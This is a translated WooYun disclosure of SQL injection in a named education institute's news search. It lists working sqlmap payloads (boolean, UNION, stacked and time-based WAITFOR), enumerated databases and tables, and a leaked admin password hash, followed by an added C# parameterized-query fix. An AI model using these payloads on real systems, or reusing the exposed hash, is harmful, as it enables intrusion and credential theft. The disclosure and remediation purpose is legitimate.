Vulnerability summary

Defect ID: wooyun-2014-078339

Title: SQL injection in a provincial education science research institute (SA privileges)

Vendor: cncert (National Internet Emergency Center)

Author: 路人甲

Submitted: 2014-10-10 10:51

Fixed: 2014-11-24 10:54

Published: 2014-11-24 10:54

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-10-10: details reported to the vendor, awaiting vendor handling
2014-10-14: vendor confirmed; details disclosed to the vendor only
2014-10-24: details disclosed to core white hats and domain experts
2014-11-03: details disclosed to regular white hats
2014-11-13: details disclosed to intern white hats
2014-11-24: details disclosed to the public

Brief description:

The search function of a provincial education science research institute is vulnerable to SQL injection.

Detailed description:

Injection point: http://www.sxsjky.com/Browse/NewsList.aspx?txtKeyword=a
---
Place: GET
Parameter: txtKeyword
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: txtKeyword=a%' AND 4761=4761 AND '%'='
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: txtKeyword=a%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(104)+CHAR(97)+CHAR(113)+CHAR(107)+CHAR(115)+CHAR(114)+CHAR(102)+CHAR(112)+CHAR(86)+CHAR(86)+CHAR(67)+CHAR(89)+CHAR(65)+CHAR(113)+CHAR(100)+CHAR(104)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: txtKeyword=a%'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: txtKeyword=a%' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user: 'sa'
Database: SY_WeiXinPlatform
[47 tables]
Database: xiaodian_web
[75 tables]
Database: monitor
[3 tables]
+---------------------------------------------------+
| jc_infor |
| jc_notice |
| jc_wtjl |
+---------------------------------------------------+
Database: WangYaWebCmsV1
[17 tables]
Database: Sooyie_sxsjky
[32 tables]
Database: msdb
[92 tables]
Database: WeiXinMessageDB
[25 tables]
Database: master
[290 tables]
Database: AwardMistakeV1
[27 tables]
Database: SxUpWeiXinPlatformV1
[33 tables]
Database: JkyWebCmsV1
[29 tables]
Database: JkyWebCmsV1
Table: uc_user
[12 columns]
+------------------+----------+
| Column           | Type     |
+------------------+----------+
| dept_id          | varchar  |
| lay_order        | int      |
| user_create_date | datetime |
| user_id          | varchar  |
| user_is_locked   | int      |
| user_last_date   | datetime |
| user_last_ip     | varchar  |
| user_login_num   | int      |
| user_name        | varchar  |
| user_pwd_encrypt | varchar  |
| user_real_name   | varchar  |
| user_type        | int      |
+------------------+----------+
Database: JkyWebCmsV1
Table: uc_user
[1 entry]
+-----------+----------------+----------------------------------+
| user_name | user_real_name | user_pwd_encrypt                 |
+-----------+----------------+----------------------------------+
| admin     | 超级管理员          | a78b5634eea2b34c25a1b6f1a1dad571 |
+-----------+----------------+----------------------------------+

[Screenshot: 2014-10-04 22:56:22的屏幕截图.png]

[Screenshot: 2014-10-04 22:56:46的屏幕截图.png]


Proof of vulnerability:

See above

Fix recommendation:

Null
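The report gives no fix. As an added example, not code from the report or from the affected site, the following shows the concatenated LIKE query that produces exactly the `a%' AND ... AND '%'='` pattern seen in the payloads, next to a parameterized version. The site's source is not on the page, so the table and column names (News, Id, Title), the method names and the connection string are assumptions.

```csharp
// Added example (not from the report). Table/column names are assumed.
using System;
using System.Data;
using System.Data.SqlClient;

public static class NewsSearch
{
    // VULNERABLE: txtKeyword is spliced into the SQL text. A value such as
    //   a%' AND 4761=4761 AND '%'='
    // closes the LIKE literal and appends attacker-controlled conditions;
    // with stacked queries ('; WAITFOR DELAY ...) any statement follows.
    public static string BuildVulnerableSql(string txtKeyword)
    {
        return "SELECT Id, Title FROM News WHERE Title LIKE '%" + txtKeyword + "%'";
    }

    // FIXED: the keyword travels as a typed parameter, so SQL Server never
    // parses it as SQL. LIKE metacharacters are escaped too, so a search for
    // "100%" matches that text literally rather than acting as a wildcard.
    public static SqlCommand BuildSafeCommand(SqlConnection conn, string txtKeyword)
    {
        var cmd = conn.CreateCommand();
        cmd.CommandText =
            "SELECT Id, Title FROM News WHERE Title LIKE @pattern ESCAPE '\\'";
        cmd.Parameters.Add("@pattern", SqlDbType.NVarChar).Value =
            "%" + EscapeLike(txtKeyword) + "%";
        return cmd;
    }

    // Escape the LIKE wildcards (%, _, [) and the escape character itself.
    public static string EscapeLike(string value)
    {
        return value.Replace("\\", "\\\\")
                    .Replace("%", "\\%")
                    .Replace("_", "\\_")
                    .Replace("[", "\\[");
    }

    // The report shows the site connecting as 'sa'. A read-only application
    // login (placeholder credentials below) limits what any remaining
    // injection can reach: no WAITFOR-based DoS escalation into other
    // databases, no msdb/master enumeration, no stored procedures.
    public static SqlConnection OpenLeastPrivilegeConnection()
    {
        const string cs = "Server=DB_HOST_PLACEHOLDER;Database=JkyWebCmsV1;" +
                          "User Id=news_reader;Password=PLACEHOLDER;" +
                          "Encrypt=True";
        var conn = new SqlConnection(cs);
        conn.Open();
        return conn;
    }
}
```

On the server side, `news_reader` should be granted only SELECT on the tables the search page reads; the sqlmap enumeration of msdb and master in this report was possible only because the application ran as `sa`.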

Copyright notice: when reproducing, please credit the source 路人甲@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2014-10-14 16:49

Vendor reply:

Latest status:

None yet